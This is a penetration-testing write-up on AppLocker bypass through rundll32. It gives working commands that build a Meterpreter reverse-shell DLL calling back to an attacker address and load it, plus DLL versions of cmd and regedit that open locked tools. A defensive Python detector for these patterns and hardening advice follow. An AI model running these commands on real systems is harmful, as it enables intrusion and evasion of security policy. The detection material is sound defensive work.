The following command needs to be executed from the command prompt. If the command prompt is locked, the method described further below can be used to unlock it.
Rundll32 will execute the arbitrary code and return a Meterpreter session. The main benefit of this is that, since it does not touch the disk, the AppLocker rule will be bypassed. However, PowerShell needs to be allowed to run on the system.
Rundll32 – Meterpreter
Metasploit's msfvenom can be used to create a custom DLL containing a Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f dll -o pentestlab.dll
The rundll32 utility can then load and execute the payload inside pentestlab.dll:
rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
A meterpreter session will be opened.
On Windows systems where the command prompt is locked via an AppLocker rule, it is possible to bypass this restriction by loading a DLL into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file, built from the open-source ReactOS variant of cmd.
Since rundll32 is a trusted Microsoft utility, it can be used to load cmd.dll into a process, execute the code in the DLL and therefore bypass the AppLocker rule and open the command prompt. Either of the following two commands can be executed from the Windows Run dialog:
rundll32 C:\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\cmd.dll
The code will be executed through rundll32 and the command prompt will be opened.
The same technique can be applied on systems where the registry editor is locked. Didier Stevens also released a modified version of the registry editor in the form of a DLL, as with the command prompt above.
Either of the following commands loads and runs regedit.dll via rundll32, bypassing the AppLocker rule in the same way:
rundll32 C:\regedit.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\regedit.dll
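All three variants above share one observable shape: rundll32.exe is handed either a DLL that lives outside the Windows directory (C:\cmd.dll, C:\regedit.dll) or a non-applet file through shell32's Control_RunDLL export (C:\Users\pentestlab.dll). The following detection logic is an added example written for this post; it is not code from the post's author or from any of the tools mentioned. It runs over a handful of constructed process-creation records in the style of Sysmon Event ID 1 (the event dictionaries, paths and the assumed Windows directory c:\windows are all made up for the example) and flags the two patterns while leaving ordinary rundll32 use, such as opening a Control Panel applet, unflagged.

```python
import ntpath
import shlex
from typing import Dict, List, Optional, Tuple

# Assumed location of the Windows directory on the host being monitored.
WINDIR = r"c:\windows"

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\cmd.dll,EntryPoint",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\regedit.dll,EntryPoint",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Benign: Control Panel applet opened through the same shell32 export.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 shell32.dll,Control_RunDLL C:\Windows\System32\desk.cpl",
     "ParentImage": r"C:\Windows\System32\control.exe"},
    # Benign: "Open with" dialog, system DLL referenced by full path.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL "C:\Users\alice\my report.pdf"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Not rundll32 at all.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _is_under_windir(path: str) -> bool:
    return path.lower().startswith(WINDIR + "\\")


def _parse_rundll32(cmdline: str) -> Optional[Tuple[str, str, List[str]]]:
    """Split 'rundll32 <module>,<export> <args...>' into (module, export, args)."""
    # posix=False keeps backslashes literal; surrounding quotes are stripped by hand.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if len(tokens) < 2:
        return None
    module, _, export = tokens[1].partition(",")
    return module, export, tokens[2:]


def analyze(event: Dict[str, str]) -> List[str]:
    """Return a list of findings for one process-creation event (empty if clean)."""
    findings: List[str] = []
    if ntpath.basename(event["Image"]).lower() != "rundll32.exe":
        return findings
    parsed = _parse_rundll32(event["CommandLine"])
    if parsed is None:
        return findings
    module, export, args = parsed

    # Rule 1: the module handed to rundll32 sits outside the Windows directory
    # (C:\cmd.dll, C:\regedit.dll). Bare names such as shell32.dll carry no
    # directory and are resolved from System32, so they are not judged here.
    if ntpath.dirname(module) and not _is_under_windir(module):
        findings.append(f"rundll32 loading DLL outside {WINDIR}: {module}")

    # Rule 2: Control_RunDLL exists to start Control Panel applets (.cpl). A file
    # with another extension, or any file outside the Windows directory, is the
    # shape of the pentestlab.dll invocation. Arguments may carry ",,<n>" suffixes
    # (e.g. desk.cpl,,3), so only the part before the first comma is examined.
    if export.lower() == "control_rundll":
        for arg in args:
            target = arg.split(",")[0]
            outside = bool(ntpath.dirname(target)) and not _is_under_windir(target)
            if outside or not target.lower().endswith(".cpl"):
                findings.append(f"Control_RunDLL with non-applet argument: {target}")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each suspicious event to its findings."""
    result = {}
    for i, event in enumerate(events):
        hits = analyze(event)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
        for h in hits:
            print(f"  - {h}")
```

The extension and path checks are heuristics over command-line text, so a DLL renamed to .cpl or dropped under a writable subfolder of the Windows directory would slip past them; the sturdier signal is the image-load event for the DLL itself (Sysmon Event ID 7, checked for signature and path) rather than the rundll32 command line. The structural fix is on the policy side: AppLocker's DLL rule collection, which is not enabled by default, applies to libraries loaded by rundll32 as well, so with DLL rules enforced an unsigned cmd.dll or pentestlab.dll is blocked regardless of which executable loads it.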